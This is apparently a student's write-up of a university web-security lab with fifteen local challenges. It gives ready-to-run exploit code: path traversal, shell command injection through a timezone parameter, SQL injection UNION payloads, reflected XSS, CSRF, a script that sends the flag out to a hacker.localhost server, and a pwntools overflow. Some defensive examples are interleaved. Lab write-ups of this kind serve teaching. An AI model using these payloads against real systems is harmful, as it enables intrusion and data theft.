
Web Security WriteUp 3 PDF

This document outlines 13 challenges for a web security course. Each challenge provides instructions for running code to exploit a vulnerability on a target website. The code examples show how to make unauthorized requests, inject code, and extract hidden flags or data.

Uploaded by

jjoseph3703
Copyright
© All Rights Reserved

CSE 365 - Web Security

Challenge 1)
1. Run the challenge using /challenge/run

2. Run ipython in a split terminal and enter the following commands one by one:

import requests
requests.get("http://challenge.localhost/?path=/flag").text
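
The request above passes an absolute path in the path parameter. The following added example (not part of the original write-up or the course material; the directory layout and both reader functions are constructed assumptions) shows why joining a request value onto a base directory does not confine it, and a resolve-then-check version that does:

```python
import tempfile
from pathlib import Path

def read_joined(base: Path, user_path: str) -> bytes:
    # Vulnerable pattern (assumed, not the challenge's source): joining a
    # request value onto a base directory. An absolute value such as
    # "/flag" discards the base entirely, no "../" needed.
    return (base / user_path).read_bytes()

def read_confined(base: Path, user_path: str) -> bytes:
    # Hardened: resolve symlinks and "..", then require the result to stay
    # inside the base directory before opening it.
    root = base.resolve()
    target = (root / user_path).resolve()
    if root != target and root not in target.parents:
        raise PermissionError(f"path escapes {root}: {user_path!r}")
    return target.read_bytes()

def demo() -> dict:
    # Constructed layout: <tmp>/files is the served directory, <tmp>/flag
    # plays the role of /flag outside it.
    with tempfile.TemporaryDirectory() as tmp:
        tmp = Path(tmp).resolve()
        served = tmp / "files"
        served.mkdir()
        (served / "index.html").write_bytes(b"hello")
        secret = tmp / "flag"
        secret.write_bytes(b"constructed-secret")
        results = {"joined_absolute": read_joined(served, str(secret))}
        for name, value in [("absolute", str(secret)), ("dotdot", "../flag")]:
            try:
                read_confined(served, value)
                results[name] = "served"
            except PermissionError:
                results[name] = "blocked"
        results["inside"] = read_confined(served, "index.html")
        return results
```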

Challenge 2)
1. Run the challenge using /challenge/run

2. Run ipython in a split terminal and enter the following commands one by one:

import requests
requests.get("http://challenge.localhost:80/?timezone=UTC%3Bcat /flag%3B").text
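
The timezone value above carries `;` characters that a shell treats as command separators. The following added example (not from the original write-up; the two functions and the `TZ=... date` command line are assumptions about how such an endpoint might be built, and a harmless `echo` marker stands in for the page's command) contrasts a shell-interpolated call with an allowlisted, shell-free one:

```python
import os
import re
import subprocess

# Constructed payload: same shape as the page's value, with a harmless marker.
PAYLOAD = "UTC;echo INJECTED;"

# Allowlist for timezone names such as "UTC" or "America/Phoenix".
TZ_NAME = re.compile(r"[A-Za-z0-9_+-]+(/[A-Za-z0-9_+-]+)*")

def date_via_shell(timezone: str) -> str:
    # Vulnerable pattern (assumed): the value is pasted into a shell command
    # line, so ";" ends the assignment and starts a new command.
    cmd = f"TZ={timezone} date"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout

def date_via_argv(timezone: str) -> str:
    # Hardened: allowlist the value, pass it through the environment, and
    # execute date directly with no shell to interpret metacharacters.
    if not TZ_NAME.fullmatch(timezone):
        raise ValueError(f"invalid timezone: {timezone!r}")
    env = {**os.environ, "TZ": timezone}
    return subprocess.run(["date"], env=env, capture_output=True, text=True).stdout
```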

Challenge 3)
1. Run the challenge using /challenge/run

2. Open a python file and run the following code using python <filename>.py

import requests
URL = "http://challenge.localhost:80/?user=1"
r = requests.get(url = URL)
print(r.content)

Challenge 4)
1. Run the challenge using /challenge/run

2. Open a python file and run the following code using python <filename>.py

import requests
form = {
"username" : 'flag" --',
"password" : "idk",
}
response = requests.post("http://challenge.localhost/", data=form)
print(response,"\n",response.text)

Challenge 5)
1. Run the challenge using /challenge/run

2. Open a python file and run the following code using python <filename>.py

import requests

params = {
"query": '" UNION SELECT password FROM users --'
}
response = requests.post("http://challenge.localhost/", params=params)
print(response.text)

Challenge 6)
1. Run the challenge using /challenge/run

2. Open a python file and run the following code using python <filename>.py

import requests
URL = "http://challenge.localhost:80/"
PARAMS = {'query': '" UNION SELECT tbl_name FROM sqlite_master; --'}
r = requests.get(url = URL, params = PARAMS)
print(r.content)

3. You will then have to run the next part of the script. You can either replace your
current file or make a new file, as I did in the screenshot (however, that was just for
demonstration purposes). All you have to change in this file is where it says TABLE
NAME.

import requests
URL = "http://challenge.localhost:80/"
PARAMS = {'query': '" UNION SELECT password FROM TABLE NAME; --'}
r = requests.get(url = URL, params = PARAMS)
print(r.content)

4. Here is a screenshot that might clear things up

Challenge 7)
1. Run the challenge using /challenge/run

2. Open a python file and run the following code using python <filename>.py

import requests

data = {"username": "flag", "password": '" UNION SELECT password, * FROM users --'}
response = requests.post("http://challenge.localhost/", data=data)
print(response.text)
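
Challenges 4 to 7 all send values containing `"` followed by SQL. The following added example (not from the original write-up or the course; the table, its rows and all four query functions are constructed assumptions) runs the payloads from Challenges 4 and 5 against a string-built SQLite query and against a parameterized one:

```python
import sqlite3

def make_db():
    """Constructed in-memory database standing in for a users table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("flag", "SECRET-PLACEHOLDER"), ("guest", "guest")])
    return db

def login_concat(db, username, password):
    # Vulnerable: request values become part of the SQL text. Default SQLite
    # builds accept "..." as a string literal, so a " in the value closes it.
    sql = (f'SELECT username FROM users '
           f'WHERE username = "{username}" AND password = "{password}"')
    return db.execute(sql).fetchall()

def login_param(db, username, password):
    # Hardened: values are bound as data and never parsed as SQL.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchall()

def search_concat(db, query):
    # Vulnerable single-column lookup, the shape a UNION SELECT extends.
    sql = f'SELECT username FROM users WHERE username = "{query}"'
    return db.execute(sql).fetchall()

def search_param(db, query):
    sql = "SELECT username FROM users WHERE username = ?"
    return db.execute(sql, (query,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    union = '" UNION SELECT password FROM users --'
    print("concat login :", login_concat(db, 'flag" --', "idk"))
    print("bound login  :", login_param(db, 'flag" --', "idk"))
    print("concat search:", search_concat(db, union))
    print("bound search :", search_param(db, union))
```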

Challenge 8)
1. Run the challenge using /challenge/run

2. Open a python file and run the following code using python <filename>.py

import requests

base_url = "http://challenge.localhost"

payload = '<html><script>alert(1)</script></html>'
visit_url = f"{base_url}/visit?url={base_url}/echo?echo={payload}"

response = requests.get(visit_url)
print(response.text)

Challenge 9)
1. Run the challenge using /challenge/run

2. Open a python file and run the following code using python <filename>.py

import requests
import urllib.parse

base_url = "http://challenge.localhost"

payload = '</textarea><html><script>alert(1)</script></html><textarea>'
encoded_payload = urllib.parse.quote(payload)
visit_url = f"{base_url}/visit?url={base_url}/echo?echo={encoded_payload}"

response = requests.get(visit_url)
print(response.text)
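
Challenges 8 and 9 reflect the echo value into the page, the second time from inside a `<textarea>`. The following added example (not from the original write-up; `render_echo` is a constructed stand-in for the echo page, not the challenge's code) renders both payloads with and without HTML escaping and counts the script elements a parser sees:

```python
import html
from html.parser import HTMLParser

PAYLOAD_8 = '<html><script>alert(1)</script></html>'
PAYLOAD_9 = '</textarea><html><script>alert(1)</script></html><textarea>'

def render_echo(value: str, context: str, escape: bool) -> str:
    # Constructed stand-in for /echo: the value lands either directly in the
    # body (Challenge 8) or inside a <textarea> (Challenge 9).
    text = html.escape(value) if escape else value
    if context == "textarea":
        text = f"<textarea>{text}</textarea>"
    return f"<!doctype html><body>{text}</body>"

class ScriptCounter(HTMLParser):
    """Counts <script> start tags, i.e. markup a browser would execute."""
    def __init__(self):
        super().__init__()
        self.scripts = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts += 1

def script_elements(page: str) -> int:
    counter = ScriptCounter()
    counter.feed(page)
    counter.close()
    return counter.scripts

if __name__ == "__main__":
    for payload, ctx in [(PAYLOAD_8, "body"), (PAYLOAD_9, "textarea")]:
        raw = script_elements(render_echo(payload, ctx, escape=False))
        safe = script_elements(render_echo(payload, ctx, escape=True))
        print(f"{ctx}: unescaped={raw} escaped={safe}")
```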

Challenge 10)
1. Run the challenge using /challenge/run

2. Open a python file and run the following code using python <filename>.py

import requests

base_url = "http://challenge.localhost"

visit_leak_url = f"{base_url}/visit?url={base_url}/leak"
response = requests.get(visit_leak_url)

if response.status_code == 200:
    info_url = f"{base_url}/info?user=1"
    response = requests.get(info_url)
    print(response.text)
else:
    print("Failed to set leaked variable")

Challenge 11)
1. Run the challenge using /challenge/run

2. Open a python file and run the following code using python <filename>.py

from flask import Flask, redirect

app = Flask(__name__)

@app.route('/')
def hello():
    return redirect("http://challenge.localhost/leak")

if __name__ == '__main__':
    app.run("hacker.localhost", 8080)

3. Then run the next Python file

import requests
from requests import Session
s = Session()

response = s.get("http://challenge.localhost/visit?url=http://hacker.localhost:8080/")
print(response.text)

flag_response = s.get("http://challenge.localhost/info?user=1")
print(flag_response.text)

4. Here is a screenshot if you are confused

Challenge 12)
1. Run the challenge using /challenge/run

2. Run the following commands in the terminal one by one. They create a folder and
some files in it:

mkdir challenge12
cd challenge12
mkdir templates
cd templates
touch lvl12.py
touch f12.py
touch index.html

3. You will have to open the folder you created (challenge12) using vscode’s menu in
the top left, file > open folder > hacker/challenge12

3. In the first python file add the following code

from flask import Flask, render_template

app = Flask(__name__)

@app.route('/')
def index():
    return render_template("index.html")

app.run("hacker.localhost", 8000)

4. In the second python file add the following code

import requests
from requests import Session
s = Session()

response = s.get("http://challenge.localhost/visit?url=http://hacker.localhost:8000/")
print(response.text)

flag_response = s.get("http://challenge.localhost/info?user=1")
print(flag_response.text)

5. In the html file add the following code

<script>
var xhttp = new XMLHttpRequest();
xhttp.open("POST","http://challenge.localhost/leak", true);
xhttp.withCredentials = true;
xhttp.send();
</script>

6. When you are done you should have something like this

7. Optional:

Challenge 13)
1. Run the challenge using /challenge/run

2. Open a python file and run the following code using python <filename>.py

from http.server import SimpleHTTPRequestHandler, HTTPServer

class WebHandler(SimpleHTTPRequestHandler):
    def handle_request(self):
        # Print client headers
        print('\n' + str(self.headers).strip() + '\n')

        # Print client data
        contentLength = int(self.headers.get("Content-Length", 0))
        if contentLength:
            print(self.rfile.read(contentLength))
            print()

        self.send_response(200)
        self.end_headers()

    def do_OPTIONS(self):
        self.send_response(200)

    def do_GET(self):
        self.handle_request()

        response = """<html>
<script>
let xhr = new XMLHttpRequest();
xhr.open("GET", `http://challenge.localhost:80/info`, false);
xhr.withCredentials = true;
xhr.send();
let flag = xhr.responseText;

xhr = new XMLHttpRequest();
xhr.open("POST", `http://hacker.localhost:1337/flag`, false);
xhr.send(flag);
</script>
</html>
"""
        self.wfile.write(bytes(response, "utf-8"))

    def do_POST(self):
        self.handle_request()

        response = ""

        self.wfile.write(bytes(response, "utf-8"))

server_address = ("127.0.0.1", 1337)

server = HTTPServer(server_address, WebHandler)
server.serve_forever()

3. Run the following command after the python file executes

curl http://challenge.localhost:80/visit?url=http%3A%2F%2Fchallenge.localhost%3A80%2Fecho%
3Fecho%3D%253Cscript%253E%2Blet%2Bxhr%2B%253D%2Bnew%2BXMLHttpRequest%2528%2529%253B%2Bxhr.
open%2528%2522GET%2522%252C%2B%2560http%253A%252F%252Fchallenge.localhost%253A80%252Finfo%
2560%252C%2Bfalse%2529%253B%2Bxhr.withCredentials%2B%253D%2Btrue%253B%2Bxhr.send%2528%252
9%253B%2Blet%2Bflag%2B%253D%2Bxhr.responseText%253B%2B%2Bxhr%2B%253D%2Bnew%2BXMLHttpReques
t%2528%2529%253B%2Bxhr.open%2528%2522POST%2522%252C%2B%2560http%253A%252F%252Fhacker.local
host%253A1337%252Fflag%2560%252C%2Bfalse%2529%253B%2Bxhr.send%2528flag%2529%253B%2B%253C%2
52Fscript%253E

Challenge 14)
1. Run the challenge using /challenge/run

2. Open a python file and run the following code using python <filename>.py (it’s the
same file as the last challenge)

from http.server import SimpleHTTPRequestHandler, HTTPServer

class WebHandler(SimpleHTTPRequestHandler):
    def handle_request(self):
        # Print client headers
        print('\n' + str(self.headers).strip() + '\n')

        # Print client data
        contentLength = int(self.headers.get("Content-Length", 0))
        if contentLength:
            print(self.rfile.read(contentLength))
            print()

        self.send_response(200)
        self.end_headers()

    def do_OPTIONS(self):
        self.send_response(200)

    def do_GET(self):
        self.handle_request()

        response = """<html>
<script>
let xhr = new XMLHttpRequest();
xhr.open("GET", `http://challenge.localhost:80/info`, false);
xhr.withCredentials = true;
xhr.send();
let flag = xhr.responseText;

xhr = new XMLHttpRequest();
xhr.open("POST", `http://hacker.localhost:1337/flag`, false);
xhr.send(flag);
</script>
</html>
"""
        self.wfile.write(bytes(response, "utf-8"))

    def do_POST(self):
        self.handle_request()

        response = ""

        self.wfile.write(bytes(response, "utf-8"))

server_address = ("127.0.0.1", 1337)

server = HTTPServer(server_address, WebHandler)
server.serve_forever()

3. Run the following command after the python file executes (this is not the same as
the last challenge)

curl http://challenge.localhost:80/visit?url=http%3A%2F%2Fchallenge.localhost%3A80%2Fecho%
3Fecho%3D%253Cscript%253E%2Blet%2Bxhr%2B%253D%2Bnew%2BXMLHttpRequest%2528%2529%253B%2Bxhr.
open%2528%2522GET%2522%252C%2B%2560http%253A%252F%252Fchallenge.localhost%253A80%252Finfo%
2560%252C%2Bfalse%2529%253B%2Bxhr.withCredentials%2B%253D%2Btrue%253B%2Bxhr.send%2528%252
9%253B%2Blet%2Bflag%2B%253D%2Bxhr.responseText%253B%2B%2Bxhr%2B%253D%2Bnew%2BXMLHttpReques
t%2528%2529%253B%2Bxhr.open%2528%2522POST%2522%252C%2B%2560http%253A%252F%252Fhacker.local
host%253A1337%252Fflag%2560%252C%2Bfalse%2529%253B%2Bxhr.send%2528flag%2529%253B%2B%253C%2
52Fscript%253E

Challenge 15)
1. Run the challenge using /challenge/run

2. Open a python file and run the following code using python <filename>.py

import requests
import pwn

response = requests.get("http://challenge.localhost/win_address%")
win_address = response.text.strip()
print(win_address)

# "A" followed by the packed address repeated 200 times, sent as the name parameter
name = "A" + pwn.p64(int(win_address, 16)).decode("latin") * 200
response = requests.get("http://challenge.localhost/greet", params={"name": name})

if "pwn" in response.text:
    print(response.text)
